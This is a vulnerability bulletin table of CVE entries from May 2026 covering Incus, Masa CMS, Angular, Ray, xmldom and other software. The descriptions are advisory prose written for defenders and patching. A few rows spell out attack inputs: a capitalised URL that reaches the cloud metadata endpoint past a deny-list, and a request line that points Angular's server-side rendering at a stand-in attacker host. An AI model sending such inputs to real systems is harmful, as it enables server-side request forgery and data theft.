| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, broken TLS validation logic in the OVN database connection logic can allow connections to an attacker's OVN database. The OVN client implementations disable Go standard TLS server verification and replace it with custom peer-certificate verification logic. That replacement verifier does not anchor trust in the configured CA certificate. Instead, it constructs the verification root set from certificates supplied by the peer during the handshake, so the configured CA is parsed but not used as the trust anchor for the final verification decision. In OVN-enabled deployments that use these SSL database connection paths, an attacker able to impersonate or intercept the OVN endpoint on the management network can present a rogue self-signed certificate chain, and Incus will accept this certificate as valid. This issue defeats the intended CA-based trust model for OVN database connections and permits endpoint impersonation by an active attacker in a suitable network position. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40243 | https://github.com/lxc/incus/security/advisories/GHSA-c839-4qxr-j4x3 https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_icnb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_icsb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_nb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_sb.go |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) >= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds. An attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40251 | https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6 https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go |
| gotenberg--gotenberg | Gotenberg is an API-based document conversion tool. In versions 8.30.1 and earlier, the default private-IP deny-lists for the --webhook-deny-list and --api-download-from-deny-list flags use a case-sensitive regular expression (^https?://) to match URL schemes. Because Go's net/url.Parse() normalizes the scheme to lowercase before establishing the outbound TCP connection, an attacker can bypass the deny-list by simply capitalizing part of the URL scheme (e.g., HTTP://, HTTPS://, or Http://). This allows unauthenticated requests to reach internal network services, including private IP ranges, loopback addresses, and cloud instance metadata endpoints such as HTTP://169.254.169.254/latest/meta-data/. This bypasses the same security control that was patched in CVE-2026-27018. This issue has been fixed in version 8.31.0. | 2026-05-05 | not yet calculated | CVE-2026-40280 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56 https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47 https://github.com/advisories/GHSA-jjwv-57xh-xr6r |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cTrash.empty function does not validate anti-CSRF tokens for trash management requests. An attacker can induce a logged-in administrator to submit a forged request that empties the trash and permanently deletes all deleted content. This can cause irreversible data loss and disrupt recovery of content intended for restoration. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, and maintain current database backups to recover from unauthorized deletion. | 2026-05-06 | not yet calculated | CVE-2026-40309 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-9f35-q62j-vm5j |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the `cTrash.restore` function does not properly validate anti-CSRF tokens for content restoration requests. An attacker can trick a logged-in administrator into submitting a forged request that restores deleted items from the trash and places them at an attacker-controlled location in the site structure through the parentid parameter. This can restore previously deleted malicious or outdated content, expose sensitive documents by moving them into publicly accessible locations, and disrupt site structure or content integrity. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, and regularly empty the trash to reduce the amount of content available for unauthorized restoration. | 2026-05-06 | not yet calculated | CVE-2026-40325 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-3mpf-gq73-crxf |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the createBundle method in `csettings.cfc` does not properly validate anti-CSRF tokens for site bundle creation requests. An attacker can craft a malicious webpage or link that, when visited by a logged-in administrator, triggers the silent creation of a comprehensive site bundle. This bundle is saved to a predictable, publicly accessible web directory. An unauthenticated attacker can then retrieve the bundle and obtain site content, user account data, password hashes, form submissions, email lists, plugins, and configuration data. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, remove unexpected bundle files from public directories, restrict access to the affected endpoint, and limit exposure of administrative sessions. | 2026-05-06 | not yet calculated | CVE-2026-40326 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-622v-h7vf-w4gm |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.5.2 and earlier, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's processing of the sortBy parameter. The application fails to properly sanitize or parameterize this input before incorporating it into dynamic SQL statements. An unauthenticated remote attacker can execute arbitrary SQL commands against the database, potentially gaining access to sensitive data, modifying or deleting records, or escalating privileges to administrative control. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, configure WAF rules to block malicious SQL patterns in the sortBy parameter sent to beanFeed.cfc. | 2026-05-05 | not yet calculated | CVE-2026-40329 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-3xpq-q494-8qq4 |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's handling of the sortDirection parameter. The parameter value is concatenated directly into SQL queries without sanitization or parameterization. An unauthenticated remote attacker can exploit this to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the underlying database server. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, use a WAF to block or restrict access to the beanFeed.cfc component, or deploy rules to detect SQL injection patterns targeting the sortDirection parameter. | 2026-05-05 | not yet calculated | CVE-2026-40330 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-56cc-gxfr-hqp8 |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, the unauthenticated JSON API accepts an altTable parameter that is stored via the setAltTable() method without validation or sanitization. This value is injected directly into a SQL FROM clause within feedGateway.cfc. An unauthenticated attacker can pass an arbitrary subquery into the altTable parameter to read sensitive data from any table in the database in a single HTTP request, including administrative credentials and password reset tokens. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, apply validation to the setAltTable function in core/mura/content/feed/feedBean.cfc to restrict input to simple alphanumeric table names, or disable the JSON API if it is not required. | 2026-05-05 | not yet calculated | CVE-2026-40331 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-jphh-r686-6w7j |
| MasaCMS--MasaCMS | Masa CMS is affected by an Open Redirect vulnerability due to improper handling of scheme-relative URLs. The application incorrectly interprets paths beginning with double slashes (//) as internal paths and processes them without confirming that the redirect target remains on the local site. An attacker can craft a URL on the trusted Masa CMS domain that redirects a victim to an external attacker-controlled site. This can be used for phishing and, in some authentication flows, may expose tokens or other sensitive data to the external site. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, reject or rewrite redirect parameters that begin with // and consider disabling forceDirectoryStructure if compatible with the deployment. | 2026-05-06 | not yet calculated | CVE-2026-40332 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-xw99-h3mw-wj47 |
| KAZEBURO--Gazelle | Gazelle versions through 0.49 for Perl allow HTTP Request Smuggling via Improper Header Precedence. Gazelle incorrectly prioritizes "Content-Length" over "Transfer-Encoding: chunked" when both headers are present in an HTTP request. Per RFC 7230 section 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests via a front-end reverse proxy. | 2026-05-06 | not yet calculated | CVE-2026-40562 | https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 https://security.metacpan.org/patches/G/Gazelle/0.49/CVE-2026-40562-r1.patch https://metacpan.org/release/KAZEBURO/Gazelle-0.50/changes |
| Apache Software Foundation--Apache Atlas | Description: Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Atlas. Apache Atlas exposes a DSL search endpoint that accepts user-supplied query strings. An attacker can alter Gremlin traversal logic within grammar-allowed characters to access unintended data. Affected Versions: This issue affects Apache Atlas from 0.8 through 2.4.0. For affected versions >= 2.0, the vulnerability exists only when Atlas is deployed with the following non-default configuration: `atlas.dsl.executor.traversal=false`. Mitigation: Users are recommended to upgrade to version 2.5.0, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-40563 | https://lists.apache.org/thread/vd0oggmqxl2k1skm0z2f9p0plx7jhmfl |
| Apache Software Foundation--Apache OpenNLP | XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor. Versions Affected: before 2.5.9, before 3.0.0-M3. Description: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support; external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry. This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario. Mitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser. | 2026-05-04 | not yet calculated | CVE-2026-40682 | https://lists.apache.org/thread/r6jpt0qr9nj67gqhppqg7jxf8vsbo0w6 |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, the secret used to sign authentication cookies is persisted to a static file at ~/.local/share/jupyter/runtime/jupyter_cookie_secret and is never rotated when a user changes their password. After a password reset and server restart, any previously issued authentication cookie remains cryptographically valid because the signing key has not changed. An attacker who has captured a session cookie through any means retains full authenticated access to the server regardless of subsequent password changes. This affects deployments using password-based authentication, particularly shared or public-facing servers where credential rotation is expected to revoke existing sessions. This issue has been fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2026-40934 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5mrq-x3x5-8v8f |
| josdejong--mathjs | Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0. | 2026-05-07 | not yet calculated | CVE-2026-41139 | https://github.com/josdejong/mathjs/security/advisories/GHSA-5v89-rwgr-qj6g https://github.com/josdejong/mathjs/pull/3656 https://github.com/josdejong/mathjs/commit/0aee2f61866e35ffa0aef915221cdf6b026ffdd4 https://github.com/josdejong/mathjs/commit/bcf0da46f0b8577ec03c9ecd7bff8b5c2543a611 https://github.com/josdejong/mathjs/releases/tag/v15.2.0 |
| Sync-in--server | Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0. | 2026-05-08 | not yet calculated | CVE-2026-41161 | https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5 https://github.com/Sync-in/server/releases/tag/v2.2.0 |
| containers--bubblewrap | bubblewrap is a low-level unprivileged sandboxing tool. From version 0.11.0 to before version 0.11.2, if bubblewrap is installed in setuid mode then the user can use ptrace to attach to bubblewrap and control the unprivileged part of the sandbox setup phase. This allows the attacker to arbitrarily use the privileged operations, and in particular the "overlay mount" operation, allowing the creation of overlay mounts which is otherwise not allowed in the setuid version of bubblewrap. This issue has been patched in version 0.11.2. | 2026-05-09 | not yet calculated | CVE-2026-41163 | https://github.com/containers/bubblewrap/security/advisories/GHSA-xq78-7hw4-5jvp https://github.com/containers/bubblewrap/releases/tag/v0.11.2 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.5.0, ci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root. This issue has been patched in version 0.31.5.0. | 2026-05-07 | not yet calculated | CVE-2026-41202 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.5.0, ci4ms Theme::upload extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the theme create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root. This issue has been patched in version 0.31.5.0. | 2026-05-07 | not yet calculated | CVE-2026-41203 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| WatchGuard Technologies--WatchGuard Agent | Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service. | 2026-05-06 | not yet calculated | CVE-2026-41286 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00011 |
| WatchGuard--WatchGuard Agent | Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service. | 2026-05-06 | not yet calculated | CVE-2026-41287 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00010 |
| WatchGuard--WatchGuard Agent | Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\\SYSTEM. | 2026-05-06 | not yet calculated | CVE-2026-41288 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011 |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8, a Server-Side Request Forgery (SSRF) vulnerability exists in @angular/platform-server due to improper handling of URLs during Server-Side Rendering (SSR). When an attacker sends a request such as GET /\evil.com/ HTTP/1.1 the server engine (Express, etc.) passes the URL string to Angular's rendering functions. Because the URL parser normalizes the backslash to a forward slash for HTTP/HTTPS schemes, the internal state of the application is hijacked to believe the current origin is evil.com. This misinterpretation tricks the application into treating the attacker's domain as the local origin. Consequently, any relative HttpClient requests or PlatformLocation.hostname references are redirected to the attacker controlled server, potentially exposing internal APIs or metadata services. This issue has been patched in versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8. | 2026-05-08 | not yet calculated | CVE-2026-41423 | https://github.com/angular/angular/security/advisories/GHSA-45q2-gjvg-7973 https://github.com/angular/angular/pull/68194 https://github.com/angular/angular/commit/ede7c58a2aa13fdccc8f0b67ce93ba1c11749412 |
| ray-project--ray | Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0. | 2026-05-08 | not yet calculated | CVE-2026-41486 | https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r https://github.com/ray-project/ray/pull/62056 https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f https://github.com/ray-project/ray/releases/tag/ray-2.55.0 |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. From version 3.68.0 to before version 3.167.0, there is a role-based-access control flaw in the LLM connection update flow. An authenticated, low-privileged user of role "member" in a project could request the update of an existing LLM connection to an attacker-controlled baseUrl, causing Langfuse to reuse the stored provider secret and redirect the test request to an attacker-controlled endpoint. This could expose the plaintext provider LLM API key for that connection. The attack is only possible if a user is already part of a project and has "member" scoped access. This issue has been patched in version 3.167.0. | 2026-05-08 | not yet calculated | CVE-2026-41487 | https://github.com/langfuse/langfuse/security/advisories/GHSA-2524-j966-gfgh https://github.com/langfuse/langfuse/pull/13027 https://github.com/langfuse/langfuse/pull/13055 https://github.com/langfuse/langfuse/commit/7527bb0d84bc0a3dc24a4b16d22ed2e46e6dddff https://github.com/langfuse/langfuse/commit/e12386f9d4368bbfff24a4ad7fd53641091605ff https://github.com/langfuse/langfuse/releases/tag/v3.167.0 |
| lsegal--yard | YARD is a Ruby Documentation tool. Prior to version 0.9.42, a path traversal vulnerability was discovered in YARD when using yard server to serve documentation. This bug would allow unsanitized HTTP requests to access arbitrary files on the machine of a yard server host under certain conditions. This issue has been patched in version 0.9.42. | 2026-05-08 | not yet calculated | CVE-2026-41493 | https://github.com/lsegal/yard/security/advisories/GHSA-3jfp-46x4-xgfj https://github.com/lsegal/yard/releases/tag/v0.9.42 |
| CROSS-signature--CROSS-implementation | CROSS implementation contains reference and optimized implementations of the CROSS post-quantum signature algorithm. Prior to commit fc6b7e7, there is a buffer overflow in crypto_sign_open() caused by an underflow of the integer mlen. This issue has been patched via commit fc6b7e7. | 2026-05-08 | not yet calculated | CVE-2026-41509 | https://github.com/CROSS-signature/CROSS-implementation/security/advisories/GHSA-w72c-hgx8-p7cv https://github.com/CROSS-signature/CROSS-implementation/commit/fc6b7e78cdf789bb5c395a81dc601356f1383da0 |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, insecure plugin upload functionality allows attackers to upload and execute arbitrary PHP code, leading to complete server compromise and persistent backdoor installation. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-41517 | https://github.com/emlog/emlog/security/advisories/GHSA-8qwx-6jx6-94x4 |
| nhost--nhost | Nhost is an open source Firebase alternative with GraphQL. Prior to version 0.49.1, Nhost automatically links an incoming OAuth identity to an existing Nhost account when the email addresses match. This is only safe when the email has been verified by the OAuth provider. Nhost's controller trusts a profile.EmailVerified boolean that is set by each provider adapter. The vulnerability is that several provider adapters do not correctly populate this field: they either silently drop a verified field the provider API actually returns (Discord), or they fall back to accepting unconfirmed emails and marking them as verified (Bitbucket). Two Microsoft providers (AzureAD, EntraID) derive the email from non-ownership-proving fields like the user principal name, then mark it verified. The result is that an attacker can present an email they don't own to Nhost, have the OAuth identity merged into the victim's account, and receive a full authenticated session. This issue has been patched in version 0.49.1. | 2026-05-08 | not yet calculated | CVE-2026-41574 | https://github.com/nhost/nhost/security/advisories/GHSA-6g38-8j4p-j3pr https://github.com/nhost/nhost/pull/4162 https://github.com/nhost/nhost/commit/ec8dab3f2cf46e1131ddaf893d56c37aa00380b2 https://github.com/nhost/nhost/releases/tag/auth%400.49.1 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-script version 5.0.2, after a refactoring, Zebra failed to validate a consensus rule that restricted the possible values of sighash hash types for V5 transactions, which were enabled in the NU5 network upgrade. Zebra nodes could thus accept and eventually mine a block that would be considered invalid by zcashd nodes, creating a consensus split between Zebra and zcashd nodes. In a similar vein, for V4 transactions, Zebra mistakenly used the "canonical" hash type when computing the sighash while zcashd (correctly per the spec) uses the raw value, which could also create a consensus split. This issue has been patched in zebrad version 4.3.1 and zebra-script version 5.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41583 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain a rk field which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a "zero" value), however, the orchard crate which is used to verify Orchard proofs would panic when fed a rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41584 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-452v-w3gx-72wg |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. From zebrad versions 2.2.0 to before 4.3.1 and from zebra-rpc versions 1.0.0-beta.45 to before 6.0.2, a vulnerability in Zebra's JSON-RPC HTTP middleware allows an authenticated RPC client to cause a Zebra node to crash by disconnecting before the request body is fully received. The node treats the failure to read the HTTP request body as an unrecoverable error and aborts the process instead of returning an error response. This issue has been patched in zebrad version 4.3.1 and zebra-rpc version 6.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41585 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-29x4-r6jv-ff4w |
| hyperledger--fabric | Hyperledger Fabric is an enterprise-grade permissioned distributed ledger framework for developing solutions and applications. From versions 1.0.0 to 2.2.26, Channel.java implements readObject() and exposes deSerializeChannel() which call ObjectInputStream.readObject() on untrusted byte arrays without configuring an ObjectInputFilter. This is a classic Java deserialization RCE pattern. At time of publication, there are no publicly available patches. | 2026-05-07 | not yet calculated | CVE-2026-41586 | https://github.com/hyperledger/fabric/security/advisories/GHSA-prf8-cf2x-rhx7 https://hyperledger.github.io/fabric-gateway |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.26.0.0 to before version 0.31.7.0, a theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP. This issue has been patched in version 0.31.7.0. | 2026-05-07 | not yet calculated | CVE-2026-41587 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fw49-9xq4-gmx6 https://github.com/ci4-cms-erp/ci4ms/commit/b969465e71eacd9eb57014ad1fce1fc34fa7bca0 |
| monetr--monetr | monetr is a budgeting application for recurring expenses. Prior to version 1.12.5, a server-side request forgery (SSRF) vulnerability in monetr's Lunch Flow integration allowed any authenticated user on a self-hosted instance to cause the monetr server to issue HTTP GET requests to arbitrary URLs supplied by the caller, with the response body from non-200 upstream responses reflected back in the API error message. This issue has been patched in version 1.12.5. | 2026-05-07 | not yet calculated | CVE-2026-41644 | https://github.com/monetr/monetr/security/advisories/GHSA-29v9-frvh-c426 https://github.com/monetr/monetr/pull/3122 https://github.com/monetr/monetr/commit/c260caa3c573a4a396ec2d264c7641a5d958385b https://github.com/monetr/monetr/releases/tag/v1.12.5 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, user-provided image and backup tarballs were unpacked and their YAML files parsed without any size restrictions. This made it easy for an authenticated user to provide a crafted image or backup tarball that, when parsed by Incus, would load a very large YAML document into memory, potentially causing the entire server to run out of memory. This issue has been patched in version 7.0.0. | 2026-05-07 | not yet calculated | CVE-2026-41648 | https://github.com/lxc/incus/security/advisories/GHSA-67wx-r9xr-x75x https://github.com/lxc/incus/releases/tag/v7.0.0 |
| alam00000--bentopdf | BentoPDF is a client-side PDF toolkit that is self hostable. Prior to version 2.8.3, a cross-site scripting vulnerability was identified in BentoPDF. An attacker may be able to execute arbitrary JavaScript in certain circumstances in the Markdown to PDF tool. This issue has been patched in version 2.8.3. | 2026-05-07 | not yet calculated | CVE-2026-41653 | https://github.com/alam00000/bentopdf/security/advisories/GHSA-6vh8-4frx-647f https://github.com/alam00000/bentopdf/releases/tag/v2.8.3 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, an authenticated user with project.add permission (default on hosted Weblate SaaS and for any user holding an active billing/trial plan) can import a crafted project backup ZIP whose components/<name>.json contains an attacker-chosen repo URL pointing at a private address (e.g. http://127.0.0.1:9999/) or using a non-allow-listed scheme (e.g. file://, git://). Weblate persists the component via Component.objects.bulk_create([component])[0], which bypasses Django's full_clean() and therefore never runs the validate_repo_url validator. The URL is subsequently written verbatim into .git/config by configure_repo(pull=False). This issue has been patched in version 5.17.1. | 2026-05-07 | not yet calculated | CVE-2026-41654 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-cwcx-382v-8m9g https://github.com/WeblateOrg/weblate/pull/19061 https://github.com/WeblateOrg/weblate/pull/19062 https://github.com/WeblateOrg/weblate/commit/e1eff1f517c1ee315d69581910baaabb724e5ef0 https://github.com/WeblateOrg/weblate/commit/e4b67a76d95d5165ecb9937f7485fd79223b7f14 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment-breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output. This issue has been patched in @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41672 | https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8 https://github.com/xmldom/xmldom/pull/987 https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7 https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, seven recursive traversals in lib/dom.js operate without a depth limit. A sufficiently deeply nested DOM tree causes a RangeError: Maximum call stack size exceeded, crashing the application. This issue has been patched in @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41673 | https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597 https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3 https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112 https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it. This issue has been patched in @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41674 | https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
